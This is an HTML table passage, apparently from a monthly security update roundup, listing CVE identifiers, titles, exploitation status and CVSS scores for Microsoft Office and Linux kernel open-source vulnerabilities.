style='font-size: undefined;'>CVE-2025-62563</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62564"><span style='font-size: undefined;'>CVE-2025-62564</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62553"><span style='font-size: undefined;'>CVE-2025-62553</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62556"><span style='font-size: undefined;'>CVE-2025-62556</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62560"><span style='font-size: undefined;'>CVE-2025-62560</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62552"><span style='font-size: undefined;'>CVE-2025-62552</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Access Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62555"><span style='font-size: undefined;'>CVE-2025-62555</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Word Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr></tbody></table><h3 style="direction: ltr;">Open Source Software vulnerabilities</h3><table><colgroup data-width='1250'><col style="width:10.802469135802468%"/><col style="width:47.22222222222223%"/><col style="width:13.734567901234568%"/><col style="width:14.814814814814813%"/><col style="width:13.425925925925927%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40244"><span style='font-size: undefined;'>CVE-2025-40244</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hfsplus: fix KMSAN uninit-value issue in __hfsplus_ext_cache_extent()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40242"><span style='font-size: undefined;'>CVE-2025-40242</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>gfs2: Fix unlikely race in gdlm_put_lock</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40251"><span style='font-size: undefined;'>CVE-2025-40251</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>devlink: rate: Unset parent pointer in devl_rate_nodes_destroy</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40262"><span style='font-size: undefined;'>CVE-2025-40262</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Input: imx_sc_key - fix memory corruption on unload</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40240"><span style='font-size: undefined;'>CVE-2025-40240</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>sctp: avoid NULL dereference when chunk data buffer is missing</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40314"><span style='font-size: undefined;'>CVE-2025-40314</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>usb: cdns3: gadget: Use-after-free during failed initialization and exit of cdnsp gadget</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40223"><span style='font-size: undefined;'>CVE-2025-40223</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>most: usb: Fix use-after-free in hdm_disconnect</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40272"><span style='font-size: undefined;'>CVE-2025-40272</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/secretmem: fix use-after-free race in fault handler</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40319"><span style='font-size: undefined;'>CVE-2025-40319</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>bpf: Sync pending IRQ work before freeing ring buffer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-66476"><span style='font-size: undefined;'>CVE-2025-66476</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Vim for Windows Uncontrolled Search Path Element Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40277"><span style='font-size: undefined;'>CVE-2025-40277</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>drm/vmwgfx: Validate command header size against SVGA_CMD_MAX_DATASIZE</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-53749"><span style='font-size: undefined;'>CVE-2023-53749</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>x86: fix clear_user_rep_good() exception handling annotation</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40233"><span style='font-size: undefined;'>CVE-2025-40233</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ocfs2: clear extent cache after moving/defragmenting extents</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40312"><span style='font-size: undefined;'>CVE-2025-40312</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>jfs: Verify inode mode when loading from disk</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40322"><span style='font-size: undefined;'>CVE-2025-40322</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>fbdev: bitblit: bound-check glyph index in bit_putcs*</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40266"><span style='font-size: undefined;'>CVE-2025-40266</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>KVM: arm64: Check the untrusted offset in FF-A memory share</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40301"><span style='font-size: undefined;'>CVE-2025-40301</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Bluetooth: hci_event: validate skb length for unknown CC opcode</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40283"><span style='font-size: undefined;'>CVE-2025-40283</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Bluetooth: btusb: reorder cleanup in btusb_disconnect to avoid UAF</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40292"><span style='font-size: undefined;'>CVE-2025-40292</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>virtio-net: fix received length check in big packets</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40280"><span style='font-size: undefined;'>CVE-2025-40280</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tipc: Fix use-after-free in tipc_mon_reinit_self().</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40281"><span style='font-size: undefined;'>CVE-2025-40281</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>sctp: prevent possible shift-out-of-bounds in sctp_transport_update_rto</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40297"><span style='font-size: undefined;'>CVE-2025-40297</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: bridge: fix use-after-free due to MST port state bypass</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40258"><span style='font-size: undefined;'>CVE-2025-40258</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mptcp: fix race condition in mptcp_schedule_work()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40273"><span style='font-size: undefined;'>CVE-2025-40273</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NFSD: free copynotify stateid in nfs4_free_ol_stateid()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40305"><span style='font-size: undefined;'>CVE-2025-40305</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>9p/trans_fd: p9_fd_request: kick rx thread if EPOLLIN</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40261"><span style='font-size: undefined;'>CVE-2025-40261</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>nvme: nvme-fc: Ensure -&gt;ioerr_work is cancelled in nvme_fc_delete_ctrl()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40243"><span style='font-size: undefined;'>CVE-2025-40243</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hfs: fix KMSAN uninit-value issue in hfs_find_set_zero_bits()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40321"><span style='font-size: undefined;'>CVE-2025-40321</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>wifi: brcmfmac: fix crash while sending Action Frames in standalone AP Mode</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40248"><span style='font-size: undefined;'>CVE-2025-40248</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>vsock: Ignore signal/timeout on connect() if already established</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40257"><span style='font-size: undefined;'>CVE-2025-40257</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mptcp: fix a race in mptcp_pm_del_add_timer()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40259"><span style='font-size: undefined;'>CVE-2025-40259</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>scsi: sg: Do not sleep in atomic context</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40252"><span style='font-size: undefined;'>CVE-2025-40252</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40215"><span style='font-size: undefined;'>CVE-2025-40215</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>xfrm: delete x-&gt;tunnel as we delete x</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40315"><span style='font-size: undefined;'>CVE-2025-40315</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>usb: gadget: f_fs: Fix epfile null pointer access after ep enable.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40285"><span style='font-size: undefined;'>CVE-2025-40285</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb/server: fix possible refcount leak in smb2_sess_setup()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40286"><span style='font-size: undefined;'>CVE-2025-40286</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb/server: fix possible memory leak in smb2_read()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40253"><span style='font-size: undefined;'>CVE-2025-40253</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>s390/ctcm: Fix double-kfree</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40317"><span style='font-size: undefined;'>CVE-2025-40317</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>regmap: slimbus: fix bus_context pointer in regmap init calls</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40217"><span style='font-size: undefined;'>CVE-2025-40217</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>pidfs: validate extensible ioctls</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40306"><span style='font-size: undefined;'>CVE-2025-40306</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>orangefs: fix xattr related buffer overflow...</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40313"><span style='font-size: undefined;'>CVE-2025-40313</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ntfs3: pretend $Extend records as regular files</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40245"><span style='font-size: undefined;'>CVE-2025-40245</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>nios2: ensure that memblock.current_limit is set when setting pfn limits</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40278"><span style='font-size: undefined;'>CVE-2025-40278</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40279"><span style='font-size: undefined;'>CVE-2025-40279</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: sched: act_connmark: initialize struct tc_ife to fix kernel leak</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40254"><span style='font-size: undefined;'>CVE-2025-40254</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: openvswitch: remove never-working support for setting nsh fields</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40250"><span style='font-size: undefined;'>CVE-2025-40250</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net/mlx5: Clean up only new IRQ glue on request_irq() failure</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40293"><span style='font-size: undefined;'>CVE-2025-40293</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>iommufd: Don't overflow during division for dirty tracking</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40220"><span style='font-size: undefined;'>CVE-2025-40220</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>fuse: fix livelock in synchronous file put from fuseblk workers</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-40304"><span style='font-size: undefined;'>CVE-2025-40304</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>fbdev: Add bounds checking in bit_putcs to fix vmalloc-out-of-bounds</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a 